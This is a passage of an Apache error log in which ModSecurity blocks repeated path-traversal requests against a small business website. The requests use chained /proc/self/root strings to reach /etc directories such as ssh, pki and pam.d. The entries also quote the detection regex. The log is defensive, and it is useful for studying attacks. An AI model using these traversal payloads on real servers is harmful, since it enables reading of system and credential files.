[tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qq_XLqtnMIWvjpaLaSQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:32.557625 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.241.31:60352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qrDJ3M9BSuKP7CAZn2gAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:33.847410 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.241.31:60368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qrV1pVZ5mVmJwsFNrIwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:34.091020 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.241.31:60368] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qrl1pVZ5mVmJwsFNrJAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:35.526812 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:60384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qr9a6ubjKNq_cu4YayAAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:37.033761 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.241.31:60394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qsfXLqtnMIWvjpaLaVwAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:38.475158 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:45090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qsta6ubjKNq_cu4YazAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:39.829217 2026] [:error] [pid 11642:tid 140411548894976] [client 74.7.241.31:45100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qs7ninkcc-iUj5AqXnAAAA5c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:40.063566 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:45100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qtLninkcc-iUj5AqXnQAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:40.502030 2026] [mime_magic:error] [pid 7893:tid 140411548894976] (70014)End of file found: [client 57.141.18.59:53510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:41:41.426956 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.241.31:45108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qtfHIg5MgXLBnicMw-QAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:43.875655 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:45116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qt-oXxyEfFpUF8f-8hgAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:45.115266 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.241.31:45118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qubninkcc-iUj5AqXogAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:46.599022 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.241.31:45132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1quhCii7xarUs8iHaoDAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:48.003062 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:44926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qvOoXxyEfFpUF8f-8jwAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:49.266247 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.241.31:44940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qvV1pVZ5mVmJwsFNrNAAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:51.701169 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:44956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qvvXLqtnMIWvjpaLabAAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:55.507213 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.241.31:44960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qw_XLqtnMIWvjpaLaeAAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:56.939873 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.241.31:44976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qxF1pVZ5mVmJwsFNrQAAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:41:58.310993 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:35676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qxvXLqtnMIWvjpaLaegAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:42:01.723638 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:35680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qx_HIg5MgXLBnicMxDgAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:42:03.333097 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.241.31:35694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qy_XLqtnMIWvjpaLafwAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:42:09.036593 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.241.31:35706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 